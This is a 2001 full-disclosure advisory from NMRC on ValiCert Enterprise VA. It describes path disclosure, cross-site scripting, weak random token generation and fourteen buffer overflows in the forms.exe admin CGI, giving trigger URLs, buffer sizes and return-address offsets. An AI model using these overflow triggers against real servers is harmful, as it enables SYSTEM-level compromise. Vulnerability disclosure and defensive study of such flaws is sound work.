Date: Tue, 4 Dec 2001 11:30:13 -0500 (EST)
From: Information Anarchy 2K01 <[email protected]>
To: [email protected]Subject: NMRC Advisory - Multiple Valicert Problems
_______________________________________________________________________________
* Information Anarchy 2K01 *
Nomad Mobile Research Centre
A D V I S O R Y
www.nmrc.org
Cyberiad [[email protected]]
Phuzzy L0gic [[email protected]]
04Dec2001
_______________________________________________________________________________
Platforms : Windows NT 4.0 with SP6a
: Windows 2000 Server
: Solaris 2.6-2.8
: AIX 4.3.3
: HP-UX 11.0
Application : ValiCert Enterprise VA v3.3 - 4.2.1 releases
(www.valicert.com)
Severity : Various
Synopsis
--------
Valicert Enterprise VA provides validity status responses for X.509
certificates and supports the following verification mechanisms:
- Certificate Revocation Lists
- CRL Distribution Points
- Online Certificate Status Protocol
The Enterprise VA product architecture consists of:
Enterprise VA Administration Server for performing management activities
Enterprise VA Host Server for processing validation requests VA API
defining custom extensions to Enterprise VA.
Numerous vulnerabilities have been located in a CGI script used by the
Enterprise VA Administration Server ranging from information gathering to
system compromise.
[Taken from www.valicert.com] - "ValiCert provides secure solutions for
paperless e-business. Customers across the globe use our products and
services to help migrate costly or inefficient business processes to the
Internet, while maintaining the highest degree of trust and security."
Tested configuration
--------------------
Testing was done with the following configurations:
Microsoft Windows NT Server 4.0
Microsoft Windows NT Service Pack 6a
The Solaris version was also tested and found to be vulnerable to most of
the overflow issues and one unique issue listed as issue #3.
The vendor, ValiCert - www.valicert.com, has confirmed that all of the above
named versions and operating systems are vulnerable.
Issue #1 - Path Disclosure
--------------------------
A path disclosure issue exists in the forms.exe CGI script used by Valicert
when an new extension is added. Valicert can be extended by adding new
extensions which are processed by custom policies. The following URL adds the
extension, ldp:
http://computer:13333/cgi-bin/forms.exe?extension=ldp&command=Add+Extension
When an invalid extension, such as foobar, is provided in the following URL:
http://computer:13333/cgi-bin/forms.exe?extension=foobar&command=Add+Extension
the server returns an error page with the following text:
Following Input/Configuration file is NOT FOUND in the required location.
FILENAME = foobar
LOCATION = D:\Program Files\ValiCert\EnterpriseVA\entserv
Make sure the file is present in the above location and try again.
Revealing the path to the Valicert installation.
Issue #2 - Cross Site Scripting Problem
----------------------------------------
Due to the lack of input validation and filtering, a cross-site scripting
issue exists in the certificate creation of the Valicert Administrative
interface. A user creating a certificate can insert HTML code into the
descriptive fields. If the certificate is viewed through the Valicert
Administrative server, the HTML is interpreted and any scripting is executed.
As an example, HTML code can be inserted into the organizational name which is
interpreted upon certificate display. In doing so, a dialog box could be
displayed, prompting the operator to enter a password. Though it is not
possible to access unauthorized resources, it could be used to engineer an
individual administering the Valicert server into entering sensitive data.
If the Administrative server is protected with a password, only those
individuals with the proper username/password can create such a certificate
containing malicious data in the fields.
Issue #3 - Random Key Generation Issue
--------------------------------------
Valicert generates 'random' tokens for communication with Hardware
Security Modules (securely stores digital certificates) using the C rand()
function call. Furthermore, the C rand() function is seeded using local
system time. Aside from the fact that the value is in itself predictible,
system clock ticks are generally not finite enough to be used as a good,
sole source of entropy. Seeding using local system time will guarantee
that the values outputted will linearly increase.
Lastly, if the '/dev/urandom' device exists, Valicert will use it by
default for certificate generation. Although for most purposes the
'/dev/urandom' device is sufficiently safe, it does not perform blocking
when its entropy pool is low. Taking into consideration that within a PKI,
non-repudiation (in the business, not the mathematical sense) is
paramount, the behavior of the '/dev/random' device is much more
favourable.
Issue #4 - Multiple Buffer Overflows
------------------------------------
Multiple buffer overflows exist in the CGI script, forms.exe, which is
used by the Valicert Enterprise VA Administration Server for management
activities. By default the Administration Server listens on TCP port 13333
and can be configured to require a username and password for access. Using
the Apache v1.3.6 web server for Win32, the Administration Server allows
an operator to use a Web browser to:
configure the Enterprise VA Host server
start/stop the Enterprise VA Host server
request product keys and licenses
create key pairs
add certificates
add or modify certificate stores
add and configure extensions
view logs
In total, fourteen (14) independent and exploitable overflows in
parameters to forms.exe have been identified which allow for code to be
executed with SYSTEM privileges. If the Administrative Server has been
configured to require a username and password for access, the attacker
requires the correct username and password to launch these attacks.
Mode Overflow:
-------------
The following URL is used to switch to server configuration mode,
http://localhost:13333/cgi-bin/forms.exe?command=change_index_mode&mode=config
Providing a mode string of 265 bytes overflows a buffer during a copy
located at 0x0040acf8 in forms.exe and overwrites the return address which
is popped off the stack at the subroutine return located at 0x0040adf9.
http://localhost:13333/cgi-bin/forms.exe?forms.exe?command=change_index_mode&mode={A x 265}
Analysis of the code and stack contents reveals that the unchecked buffer
is 256 bytes long, followed by two pointers or 32-bit integers on the
stack and then the return address.
Certificate_File Overflow:
-------------------------
The following URL is used to create a Microsoft-type certificate.
Providing a Certificate_Files parameter of 1028 bytes overflows a buffer
during a copy located at 0x0040599a in forms.exe and overwrites the return
address which is popped off the stack at the subroutine return located at
0x00405cb8.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?CertServerSelection
=Microsoft&Certificate_Type=SHARE&Certificate_Files
={A x 1028}&command=Submit+Certificate+Type
Analysis of the code and stack contents reveals that the unchecked buffer
is 1024 bytes long, immediately followed by the return address on the
stack.
useExpiredCRLs Overflow:
------------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the useExpiredCRLs parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b9dc in forms.exe and overwrites the
return address which is popped off the stack at the subroutine return
located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs={A x 1288}&maxOCSPValidityPeriod
=0&command=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the stack.
listenLength Overflow:
---------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the listenLength parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b54e in forms.exe and overwrites the
return address which is popped off the stack at the subroutine return
located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength={A x 1288}&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.
maxThread Overflow:
------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the maxThread parameter a value of 1288 bytes overflows a buffer
during a copy located at 0x0040b5f3 in forms.exe and overwrites the return
address which is popped off the stack at the subroutine return located at
0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread={A x 1288}&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.
maxConnPerSite Overflow:
-----------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the maxConnPerSite parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b67f in forms.exe and overwrites the
return address which is popped off the stack at the subroutine return
located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite={A x 1288}&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.
maxMsgLen Overflow:
------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the maxMsgLen parameter a value of 1288 bytes overflows a buffer
during a copy located at 0x0040b70b in forms.exe and overwrites the return
address which is popped off the stack at the subroutine return located at
0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
={A x 1288}&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.
exitTime Overflow:
-----------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the exitTime parameter a value of 1288 bytes overflows a buffer
during a copy located at 0x0040b797 in forms.exe and overwrites the return
address which is popped off the stack at the subroutine return located at
0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime={A x 1288}&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.
blockTime Overflow:
------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the blockTime parameter a value of 1288 bytes overflows a buffer
during a copy located at 0x0040b823 in forms.exe and overwrites the return
address which is popped off the stack at the subroutine return located at
0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime={A x 1288}&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.
nextUpdatePeriod Overflow:
-------------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the blockTime parameter a value of 1288 bytes overflows a buffer
during a copy located at 0x0040b8af in forms.exe and overwrites the return
address which is popped off the stack at the subroutine return located at
0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod={A x 1288}&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.
buildLocal Overflow:
-------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the buildLocal parameter a value of 1288 bytes overflows a
buffer during a copy located at 0x0040b950 in forms.exe and overwrites the
return address which is popped off the stack at the subroutine return
located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal={A x 1288}&useSoftwareSigning
=Software&sslSigningType=Software&sslServerHost=&sslCertFile
=sslCert.cert&sslPrivateKey=ssl.privkey&useExpiredCRLs
=0&maxOCSPValidityPeriod=0&command=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.
maxOCSPValidityPeriod Overflow:
------------------------------
The following URL is used to reconfigure the Valicert server which
responds to validation requests.
Providing the maxOCSPValidityPeriod parameter a value of 1288 bytes
overflows a buffer during a copy located at 0x0040ba68 in forms.exe and
overwrites the return address which is popped off the stack at the
subroutine return located at 0x0040bb17.
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?serverHost=computer&port
=80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen
=20000&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile
=logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType
=Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey
=ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod={A x 1288}&command
=Submit+Configuration+Parameters
Analysis of the code and stack contents reveals that the unchecked buffer
is 1284 bytes long, immediately followed by the return address on the
stack.
extension Overflows:
-------------------
Valicert can be extended by adding new extensions which are processed by
custom policies. Attempting to add an extension with a file name of 995
bytes in length overflows a buffer at an sprintf located at 0x00417A9B in
forms.exe while the error message to be displayed to the client is
constructed. The long string overwrites the return address which is popped
off the stack at the subroutine return located at 0x00417AD0.
http://localhost:13333/cgi-bin/forms.exe?extension={A x 995}&command=Add+Extension
Analysis of the code and stack contents reveals that the subroutine
starting at 0x0040FEC0 makes many unchecked copies while converting the
extension parameter to an absolute filename (i.e. D:\Program
Files\ValiCert\EnterpriseVA\entserv\AAA..) and checking for existence,
etc. During the course of these copies, terminating null's in (assumed)
fixed-length buffers containing the filename are overwritten. As a result,
the absolute filename passed to the offending sprintf call is much longer
than expected. A solution to the sprintf problem will still leave the
overflows in 0x0040FEC0, which may possible be exploited.
Private Key Generation Overflow:
-------------------------------
The operator can use the Administrative Server to generate new private
keys for SSL communications or use in signing OCSP responses. An overflow
exists in the processing of requests for the generation of private keys.
The following is one example of how this overflow can be triggered by
requesting a new private key for SSL communications. Long strings in all
other parameter values other than the:
country_name
gen_self_signed_cert
command
keytype
parameters will also trigger the overflow and overwrite a return address
on the stack. The following URL overwrites the return address with the
opt_company_name value (xxxx).
[The following URL is line wrapped]
http://localhost:13333/cgi-bin/forms.exe?country_name=XX&state_name
=XX&locality_name=XX&org_name=XX&org_unit_name=X&common_name=X&email_address
=X@X&challenge_password={A x 833}&opt_company_name=xxxx&gen_self_signed_cert
=1&command=Submit+SW+Certificate+Request&keytype=BASIC%3BKEY_1
Analysis of the code and stack contents reveals that the parameters:
country_name
state_name
locality_name
org_name
org_unit_name
common_name
email_address
challenge_password
opt_company_name
are parsed and then reformatted using an sprintf statement called at
0x402C2E8. The destination buffer is too small to contain the results and
overflows, overwriting the return address with the value in the
opt_company_name parameter. The corrupted return address is popped off the
stack at 0x0040C58A. The following set of constraints must be met for the
overflow to occur:
a) The country_name parameter must be exactly two bytes long otherwise
the offending sprintf call is never reached.
b) The email_address parameter must be of the form string@string
otherwise the offending sprintf call is never reached.
c) The total length of all parameters must be 864 bytes for the result
from sprintf to overwrite the return address. Longer lengths will
cause the buffer overflow but will also overwrite parameters passed
to the subroutine, causing the CGI script to crash before the
subroutine terminates and pops off the corrupted return address.
Vendor Response
---------------
ValiCert provided NMRC with their own advisory listing mitigation and fix
information but also informed NMRC that their advisory contains ValiCert
Inc. confidential and proprietary information. Based on this we are
unsure of what information we can provide as a vendor response and urge
all customers of ValiCert to contact [email protected] for more
information.
NMRC Suggested Mitigation
------------------------
NMRC offers the following suggestions to prevent these vulnerabilities
from being exploited:
If remote web administration is required, do so over an SSL connection to
prevent the admin user id and password from being captured. Otherwise,
blocking TCP port 13333, which is used for remote admin would prevent the
overflows from being sucessful.
Comments
--------
NMRC first made contact with ValiCert at [email protected] on November
3, 2001 and no response was received. As per the NMRC disclosure policy,
we should have released this advisory after waiting for a period of 5
business days. Due to the massive amount of issues found with this
product we decided to give ValiCert one last chance at a response and sent
them an additional email, also to [email protected], on November 14,
2001 and received a response a few days afterwards.
ValiCert also asked NMRC to not release the full details of the problems
reported, in particular the overflows, but it is our opinion that not
releasing the details does not provide any additional protection as high
level details are enough for an intelligent researcher to discover the
complete details and in support of full disclosure we have refused to
censor any details of the problems above.
ValiCert has also asked NMRC not release this advisory for a period of 60
days based on how some of ValiCert's customers perform change control. We
feel that something like a security patch warrants emergency change
control and if ValiCert truly cared about their customers, they would have
audited their code before releasing it. NMRC feels that the migitation
techniques of firewalling the port used by remote administrators
(most businesses, as a rule, do not allow port 13333 through their
firewall anyway) is adequate protection from potential outside intruders.
Besides, even CERT only gives 45 days.
An archive of the email exchanges between ValiCert and NMRC will be
available shortly at:
www.nmrc.org/InfoAnarchy/VCert.txt
This advisory has been released in support of Information Anarchy 2K01
www.nmrc.org/InfoAnarchy
Greetz
------
eEye - keep the fight for full disclosure and don't sell out!
Simple Nomad - we are taking over NMRC so stop yelling "Get off my lawn" :-)
hellNbak - wrote this advisory and dealt with the vendor so he has to get
his name somewhere.
The rest of NMRC - thanks for supporting InfoAnarchy 2K01! You guys rock!
RFP, Attrition, VulnWatch, and anyone else who supports FULL DISCLOSURE.
-------
"If knowledge is power then power is free, support Responsible Full
Disclosure"
-- hellNbak, NMRC
"I get the feeling that we can almost make a career out of providing
security critique of their EVA product alone"
-- Phuzzy L0gic, NMRC
"It's almost like they had to try and make it this insecure"
-- chameleon, Rhino9
-------
Copyright
--------
This advisory is copyright 2001 NMRC - feel free to distribute it without
edits but fear us if you use this advisory in any type of commercial
endeavour.